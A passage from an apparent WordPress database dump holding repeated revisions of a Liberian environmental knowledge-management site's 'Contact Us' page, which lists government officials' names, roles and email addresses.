href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:29:36','2021-03-23 10:29:36','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3610,42,'2021-03-23 10:30:57','2021-03-23 10:30:57','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:30:57','2021-03-23 10:30:57','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3611,42,'2021-03-23 10:30:57','2021-03-23 10:30:57','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		